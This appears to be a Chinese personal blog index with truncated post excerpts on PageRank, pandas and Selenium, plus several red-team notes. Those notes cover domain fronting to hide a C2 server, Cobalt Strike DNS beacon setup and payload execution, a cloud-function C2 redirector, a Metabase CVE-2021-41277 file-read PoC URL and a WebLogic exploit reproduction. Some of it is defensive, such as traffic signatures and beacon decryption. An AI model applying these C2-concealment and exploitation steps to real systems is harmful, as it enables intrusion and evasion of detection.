WUTONG

PAGERANK学习笔记一、PageRank简介​ PageRank(PR)是谷歌搜索用来在搜索引擎中对网站进行排名的算法，Sergey Brin and Lawrence Page 发布了一篇论文《The Anatomy of a Large-Scale Hypertextual Web Search Engine.》。其中提出PageRank算法，PageRank算法输出一个概率分布，用于表示随机点击链接的人到达任何特定页面的可能性。可以计算任何大小的文档集合的PageRank。PageRank 计算需要通过集合进行多次传递（称为“迭代”），以调整近似的 PageRank 值，以更贴近理论真实值。 ​ 在最初的google paper中介绍这个算法的等式是 我们假设页面 A 具有页面 T1…Tn 指向它。参数 d 是一个阻尼系数，可以设置为 0 到 1 之间。我们通常将 d 设置为 0.85。此外，C（A）被定义为从页面A流出的链接数量。 PageRanks在网页上形成概率分布，因此所有网页的PageRanks的总和将为1。 PageRank可以被认 ...

一、简介1、原理​ 域前置（Domain fronting），是一种能够隐藏连接真实端点来规避互联网审查的技术。在应用层上运作时，域前置使用户能通过 HTTPS 连接到被屏蔽的服务，而表面上像是在与另一个完全不同的站点通信。 ​ 因为在处理HTTPS请求时，CDN会首先将它解密，并根据HTTP Host的值做请求转发，所以用户想要访问一个非法网站，可以使用一个CDN上的合法的域名作为SNI（和TLS服务器名称指示），然后使用想要访问的网站作为HTTP Host与CDN进行HTTPS通信 二、环境准备​ VPS服务器、域名 1、添加CDN A记录https://www.cloudflare.com/zh-cn/ 2、找到CDN后的IPhttps://dns.aizhan.com/ 3、找到使用相同CDN的域名可以通过asn来查询 4、测试 curl 域前置 12curl www.aaa.com -H "Host:www.attack.com" -v#curl //相同CDN的域名 -H "Host:C2的域名 ...

一、环境 Cobalt strike4.4 VPS（服务器） 域名 二、域名解析配置一条A记录，一条NS记录 1、申请一个域名​ 【WWW.XX#X.TK] 2、配置解析记录​ 此次使用的是CDN配置 ​ 地址：https://dash.cloudflare.com/ 123NS记录：NS1 NS1.xxx.tk WWW.xxx.tk A记录： A WWW.xxx.tk IP 3、等待生效​ 时间比较久 三、CS DNS Beacon1、VPS运行服务端12./teamserver VPS-IP Password#注意53端口，如存在服务，需要关闭 netstat -ano | grep 53 2、本地机器添加监听DNS-HOSTS 使用的是NS的域名 3、生成木马 4、上线​ 目标机执行木马，但默认情况下主机信息是黑色，需要执行 12checkin mode dns-txt 四、CS上线流量特征​ 受害机器发送大量的请求包，并且很多流量包中请求和响应的的域名较长 过滤查询域名长度超过一定数值时判定 ...

原文： https://blog.nviso.eu/2021/10/21/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-1/ 一、Cobalt Strike 公钥和私钥Cobalt Strike 信标（客户端）和 Cobalt Strike 团队服务器 (C2) 之间的通信使用 AES 加密（即使它通过 HTTPS 进行） 公钥和私钥存储在文件 .cobaltstrike.beacon_keys 中。这些密钥是在首次使用 Cobalt Strike 团队服务器软件时生成的。 二、使用捕获文件：使用文章中的数据包进行测试。 数据包：https://www.malware-traffic-analysis.net/2021/02/02/index.html 第一步 找到信标1http.request.uri matches "...$" 第二步 查看是否是CS生成的shellcodeMetasploit 和 Cobalt Strike 为 http(s) shell 生成 shel ...

设置中文sep=’\t’ csv文件默认的是以逗号为分隔符，但是中文中逗号的使用率很高，爬取中文数据时就容易造成混淆，所以使用pandas写入csv时可以设置参数 sep=’\t’ ，即以tab为分隔符写入。 一、读取和写入1、可读文件 filepath_or_buffer #需要读取的文件及路径 sep / delimiter 列分隔符，普通文本文件，应该都是使用结构化的方式来组织，才能使用dataframe header 文件中是否需要读取列名的一行，header=None(使用names自定义列名,否则默认0,1,2,…)，header=0（将首行设为列名） names 如果header=None，那么names必须制定！否则就没有列的定义了。 shkiprows= 10 # 跳过前十行 nrows = 10 # 只去前10行 usecols=[0,1,2,…] #需要读取的列，可以是列的位置编号，也可以是列的名称 parse_dates = [‘col_name’] # 指定某行读取为日期格式 index_col = None /False /0，重新生成一列成为 ...

邮件相关【杂】一、内网邮件服务器​ 第三方软件HMailServer，可以很容易搭建内网邮件服务器 —适用于windows 亲测有效。留存。【很详细】 https://www.cnblogs.com/tiger-fu/p/7448005.html https://blog.csdn.net/gelupu/article/details/38325029 二、邮件​ 建议可以使用云函数发送，可以避免自身的真实IP泄露 pyhon 发送邮箱【带附件】 #注意模块的安装 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152import smtplibfrom email.mime.text import MIMETextfrom email.mime.multipart import MIMEMultipart#输入发件人邮箱名称email_name = '邮箱【建议写自定义邮箱】'# 输入用户授权码passwd & ...

Metabasegeojson任意文件读取漏洞CVE-2021-41277一、漏洞描述​ 在受影响的版本中，自定义 GeoJSON 地图（admin->settings->maps->custom maps->add a map）操作缺少权限验证，攻击者可通过该漏洞获得敏感信息 二、漏洞影响 metabase version < 0.40.5 metabase version >= 1.0.0, < 1.40.5 1、fofa.so搜索1"Metabase geojson" POC:1https://IP/api/geojson?url=file:xxxxx

云函数&CS&MSF一、云函数1、新建云函数 2、创建自定义模板 3、下滑页面，写入代码 云函数内容 123456789101112131415161718192021222324252627# -*- coding: utf8 -*-import jsonimport base64import socket,timeimport requestsdef main_handler(event, context): c2 = "http://服务器ip" # event=json.dumps(event) path = event['path'] # # print(path) headers = event['headers'] ip = event['requestContext']['sourceIp'] # # # # # try: headers['X-F ...

CVE-2021-2394一、简介​ oracle公司在2021年7月重要补丁更新报告中，通告中披露了WebLogic组件存在高危漏洞，攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞的WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。 二、复现环境：平台： 12 windows 10 ​ kali2021 工具： 123456 jdk8 (注意，安装目录不可有空格） ​ weblogic_12.2.1.3.0​ maven3.8.2 ​ marshalsec ​ exp ​ python3 三、受影响版本123456789 Oracle WebLogic Server 10.3.6.0.0​ Oracle WebLogic Server 12.1.3.0.0​ Oracle WebLogic Server 12.2.1.3.0​ Oracle WebLogic Server 12.2.1.4.0​ Oracle WebLogic Server 14.1.1.0.0 四、修复方式官方已发布补丁。 ...

一、简介自动化测模块，通过驱动浏览器，模拟浏览器的操作，比如跳转、输入、点击、下拉等，来拿到网页渲染之后的结果，可支持多种浏览器。 二、安装3.1、pip 安装1pip install selenium 3.2、安装驱动注：安装完记得配置环境变量~ [path] Firefox浏览器驱动：geckodriver ​ https://github.com/mozilla/geckodriver/releases Chrome浏览器驱动： ​ http://chromedriver.storage.googleapis.com/index.html IE浏览器驱动：IEDriverServer ​ http://selenium-release.storage.googleapis.com/index.html Edge浏览器驱动：MicrosoftWebDriver ​ https://developer.microsoft.com/en-us/microsoft-edge/tools/webdriver/ Opera浏览器驱动：opera ...